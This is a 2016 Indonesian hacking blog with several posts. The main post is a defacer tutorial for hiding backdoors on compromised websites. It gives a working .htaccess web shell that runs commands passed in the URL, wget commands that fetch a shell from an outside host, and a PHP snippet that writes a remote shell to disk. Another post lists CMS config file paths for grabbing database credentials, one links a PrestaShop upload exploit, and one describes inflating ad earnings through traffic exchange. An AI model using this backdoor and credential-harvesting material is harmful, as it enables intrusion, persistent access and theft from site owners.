Minggu, 21 Agustus 2016

Trik Menyisipkan Hidden Backdoor


Pada tutor ini seperti di judul, kita akan membahas cara menyisipkan backdoor ke suatu file,
Masalah terbesar para Defacer adalah ketika file backdoornya di hapus si mimin (admin) atau malah kena Redeface Defacer lain, karena bug (celah) belum di tutup. Pasti pernah kan kek gitu? udah pasti pernah kan? yakan, yakan :v

Ini adalah solusi untuk mengantisipasi kemungkinan diatas.
Method lama cuman gw share kembali, biar manfaat buat para generasi penerus bangsa :3
Oke langsung saja ke triknya,
Disini gw punya 2 cara :

CARA 1
1. Gw asumsikan lu udah punya target atau sudah nanem backdoor di dalem webnya,
2. Buat file baru dengan ekstensi .php/.htaccess, isi dengan script ini :
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>
3. Di contoh ini, file gw kasih nama .htaccess
NOTE:
a. Upayakan file di atas tersimpan di directory yang sekiranya admin tidak akan curiga
b. Fungsi script diatas adalah allow shell command
4. Di langkah ini seharusnya lu udah kebayang kan bagaimana cara kerjanya :v

CARA KERJA SCRIPT :
A. Melihat Isi Sempak :3
1. Untuk menampilkan list directory di server linux, command gini: site/.htaccess?cmd=ls , Kalau make server windows tinggal ganti dengan: dir
2. Hasilnya list akan menyamping, belum nemu cara biar hasilnya bisa rapi kebawah :3
3. Screenshot

B. Menanam Bekdur :v
1. Kita manfaatkan fungsi wget, untuk mengambil script backdoor yang sudah ada di web lain
*Upload file backdoornya di hosting gratisan atau make pastebin jga bisa
2. Command gini: site/.htaccess?cmd=wget http:/www.websitemu.com/shell.php
*File extension terserah (.php , .txt , .jpg , dll) . Di contoh ini make .txt
3. Screenshot
4. Jika sudah di eksekusi, cek lagi dengan command: site/.htaccess?cmd=ls
5. Screenshot
6. Shell sudah masuk, haha :D Jika backdoor yang di wget tdi .php, lu bisa langsung eksekusi. Karena di contoh ini gw make .txt maka harus di rename dulu filenya biar bisa jalan backdoornya, di step berikutnya akan di bahas cara merenamenya (buat yang biasa make linux bisa skip :v , tutorial ini buat yang masih pemula)

C. Rename File
1. Caranya sangat simple,
2. Command gini: site/.htaccess?cmd=mv nama-file-awal  nama-yang-diinginkan
3. Screenshot
4. Jika masih penasaran file sudah berubah atau belum, bisa cek dengan: site/.htaccess?cmd=ls
5. Screenshot
6. Tinggal Eksekusi deh, haahahaha :v

F.A.Q
you: Jadi ini cuman mainan di address bar aja iya?
me: Ya, cocok buat yang make addons hackbar (yang injector pasti tau lah :v) lebih mudah :3

CARA 2
1. Seperti di CARA 1, lu harus di dalem website target dulu,
2. Script untuk memanggil shellnya :
$nama= fopen("backdoor.php" ,"w+");
$file = file_get_contents('http://www.websitemu.com/shell.php');
$tulis = fwrite ($nama ,$file);
fclose($nama);
NOTE:
a. backdoor.php = nama file yang akan dibuat nanti
b. http://www.websitemu.com/shell.php = shell dari website lain (bisa format .php ataupun .txt)

CARA PENGGUNAAN :
1. Sisipkan script di atas, ke file apapun (yang penting ingat namnya)  *Harus file berekstensi .php
2. Jika file yang disisipkan script barusan di akses, maka backdoor akan otomatis terbuat

F.A.Q
you: Masa sih bisa langsung terbuat?
me: Langsung di coba aja daripada penasaran :3

Semoga Bermanfaat ^.^

Sabtu, 20 Agustus 2016

Web Shell Detector


Pasti gak asing lagi di telinga. Nama "backdoor" udah seperti makanan sehari-hari buat para developer web, programmer web, dan yg biasa nongkrong di underground network :3
Nah pada tutorial kali ini, gw mau share script yang berguna banget buat developer dan programmer web atau yang lagi belajar web sekuriti eeiits, mksudnya security. Bukan satpam loh ya -_-
Script ini berfungsi untuk menscan file-file (yang di curigai sebagai suspicious/shell) termasuk file yang di dalam folder, sampai ke akar" nya.
Pasti penasaran dong gmna cara kerjanya script ini.

Script ini dibuat oleh orang asal Israel dengan codename Maxim,
Dibuat 2 tahun yang lalu,
Dia membuat project-project dan salah satunya Web Shell Detector ini,
Jika Ingin lihat projectnya bisa ke Github
Oke lanjut ke cara penggunaannya ya, begini :

1. Copas script dibawah, simpan dengan nama shelldetect.php


2. Copas script dibawah, simpan dengan nama shelldetect.db


3. Simpan dalam 1 folder
4. Jalankan dengan memanggil name file. Contoh site.com/shelldetect.php atau bisa juga dijalankan di server local / localhost

NOTE :
2 File di atas harus di simpan satu folder, lebih baik jika disimpan dan dijalankan di /public_html/

Screenshot :

JIKA TIDAK DITEMUKAN FILE MENCURIGAKAN

JIKA DITEMUKAN FILE YANG MENCURIGAKAN

Semoga Bermanfaat :D

Kamis, 18 Agustus 2016

Daftar Letak File Config CMS Website


Semua website pasti ada yg namanya file config,
Yang fungsinya untuk menghubungkan frontend website ke backend (database),
Nah, dari pada ilmuya w pke sndiri lbh baik kan di share ke orng bnyak kan biar manfaat :'v
Jika udh tau nih file confignya, dan kalo ja kebetulan targetmu make cms yg ada di daftar ini, bisa lngsung di sabun massal lwat shell hsh < biasanya nih kalo defacernya lgi galau, main sikaat aja, tanpa pikir panjang :3
Buat yg biasa ngoding nih, bisa jga ini bwat nambah fitur di shellnya, auto edit/grab apalah itu namanya :v
Dah gtu aja basa basinya, jika masih blum paham lu gugel aja, artikel udh bnyk bertebaran :3

Ini adalah daftar letak config yg selama ini gw tau, kali aja ada yg mau nambahin bisa taruh di komentar, ntar w update artikelny :D
cekidoot....

Cpanel
rootdir/.my.cnf

Hash WHM
rootdir/.accesshash

Laravel
rootdir/.env

BosWeb
/public_html/bw-configs/config.ini

Lokomedia
/public_html/lokomedia/config/koneksi.php
/public_html/config/koneksi.php

WHMCS
/public_html/whm/configuration.php
/public_html/whmcs/configuration.php
/public_html/clientarea/configuration.php

Drupal
/public_html/sites/default/settings.php

PrestaShop
/public_html/config/settings.inc.php

OpenCart
/public_html/admin/config.php

Ellislab
/public_html/application/config/database.php

MyBB
/public_html/inc/config.php

VBULLETIN
/public_html/include/config.php

phpBB
/public_html/config.php

Joomla
/public_html/configuration.php

WordPress
/public_html/wp-config.php

ipb
/public_html/conf_global.php

e107
/public_html/e107_config.php

Oscommerce
/public_html/includes/configure.php

php-fusion
/public_html/config.php

Smf
/public_html/Settings.php

php nuke
/public_html/html/config.php

Xoops
/public_html/mainfile.php

Zen Cart
/public_html/includes/configure.php

setidio
/public_html/datas/config.php

Magento
/public_html/app/etc/local.xml

Balitbang
/public_html/lib/config.php

Smoga bermanfaat :)

Sabtu, 13 Agustus 2016

Cara Menjalakan IIS7 dan XAMPP (Apache) di Windows


Setelah sekian lama nggak ngepost, mumpung ada wktu jdi dbikin tutorial ini, hehe
Buat para developer pasti pgen tau kan sensasi mnjalankan 2 web server dalam satu machine,
Untuk mmbantu jga yg mau belajar bikin project, riset riset, experimen :v
Nah pada tutorial ini gw mo share cara setting nya,
Pada intinya kita hanya butuh merubah portnya saja biar ngga' tabrakan bos,
Oke ya, lngsung ke tutor nya :

A. Setting Port Xampp
1. Lu hrus tau dlu direktori xampp nya :v . direktori default xampp ada di c:\xampp\
2. Sekarang masuk ke \xampp\apache\conf
3. Biar aman, backup dlu file "httpd.conf". Krn file ini yg kita konfigurasi
4. Rename terserah lu, klo gw jadi gini "httpd.conf.bak"
5. Buka file httpd.conf dgn text editor, make notepad / notepad++ terserah
6. Cari text :
a. Listen 80
(Defaultnya ada di line 47)
ganti menjadi Listen 8080
b. ServerName localhost:80
(Defaultnya ada di line 181)
ganti menjadi ServerName localhost:8080
7. Selanjutnya masuk ke \xampp\apache\conf\extra
8. Buka file httpd-ssl.conf (bisa di backup dlu, bwat jaga")
9. Cari text:
a. Listen 443
Ubah ke 449
b. <VirtualHost _default_:443>
Ubah ke <VirtualHost _default_:449>
c. ServerName www.example.com:443 / ServerName localhost:449
NOTE:  Knpa ada dua? Krn di versi xampp berbeda", ada dua kmungkinan, jadi coba satu".
Ubah ke ServerName www.example.com:449 / ServerName localhost:449
10. Setting selesai, silahkan di jalankan lgi xampp nya. Start dlu di XAMPP Control Panel nya, lalu akses ke http://127.0.0.1:8080/ atau http://localhost:8080/
11. Doc root ada di \xampp\htdocs

Belum Terinstall XAMPP ? Masuk sini stah

B. Setting Port IIS 7
1. Tidak perlu di setting portnya
2. IIS jga tidak perlu di Start dlu sperti halnya xampp, karena iis otomatis running saat windows jalan
3. Untuk aksesnya, lngsung ketik: localhost
4. Doc root ada di C:\inetpub\wwwroot

Belum Terinstall IIS 7 ? Masuk sini ster

Semoga bermanfaat ^.^

Sabtu, 25 Juni 2016

Auto Exploit Prestashop 1.6 Arbitrary File Upload


Memudahkan untuk yang males copas atu" dari link ke exploit csrf, bisa make cara ini :v
Untuk dork dan penjelasan lain bisa artikel sebelumnya kesini

Script original dari ustadcage48

Comot dimari :
disini

Semoga Bermanfaat :)

Trik Mempercepat Penghasilan Popcash.net


Buat yg ga' sabar nunggu earning popcash kok lama yaa? ya itu krna visitor di site/blogmu rendah :'v
tpi jgn nyerah, di tutor ini seperti di judul w akan share triknya dsini
lngsng ja ya ke step stepnya..

Syarat :
- Akun Popcash (Kalau blm, ikutin intruksi+cara cepat di approve disini)
- Email aktif tentunya
*Jika sudah punya syarat"ny bisa lngsng ikutin langkah" dibawah

Cara Mudah Mendapatkan Url Popcash :
- Khusus untuk pengguna Mozilla Firefox
- Masuk ke Option > Content > Pop-ups > Centang Block pop-up windows
- Buka site/blogmu yg sdh terpasang script dari Popcash
- Klik di sembarang sisi pada blog. Nanti akan muncul notif seperti gmbar di bwah ini, lalu Klik pada Options > Klik Show 'http://www.popcash.net/world/go/blablabla..'
- Ketika muncul popup window nya, langsung copas link nya sebelum ke redirect ke website iklan lain
- Jika yang lu copas benar, kurang lebih seperti ini
http://www.popcash.net/world/go/111XXX/240207/aHR0cCUzQSXXXXXXXXXXXXXXXX
- Jika tidak sama dengan contoh url diatas, brarti salah. Ulangin lagi langkah diatas. Dan jika sudah dapat url popcashnya bisa lanjut ke langkah dibawah

Next step..
Langkah - Langkah :
- Daftar disini
- Klik "Sign Up"
- Isi data seperti biasanya
- lalu konfirm email untuk aktivasi
- Jika sudah masuk ke menu "My Website>ADD NEW WEBSITE"
- Isi formnya dengan link popcashmu, jika sudah klik Submit, lebih jelasnya lihat gambar dibawah
- Sekarang masuk ke menu "Earn Traffic" > Lalu download software HitLeap Viewernya
- Install dan Buka software nya, login dengan akunmu.
- Jika sudah masuk akan seperti gmbar dibawah ini, lalu klik "START EARNING MINUTES"
- Dan biarkan softwarenya bekerja, Minimaze saja jika ingin membuka browser atau yg lain
- Tiap menit yang lu gunakan untuk surfing di situs ini, akan menambah All-Time Minutes Earned yang nantinya akan ditukar dengan kunjungan ke situs popcash tadi. Udah kebayang kan gmna cara kerja softwarenya :D

HASIL DALAM 2 HARI
Sebelum
 Sesudah
Semoga bermanfaat :)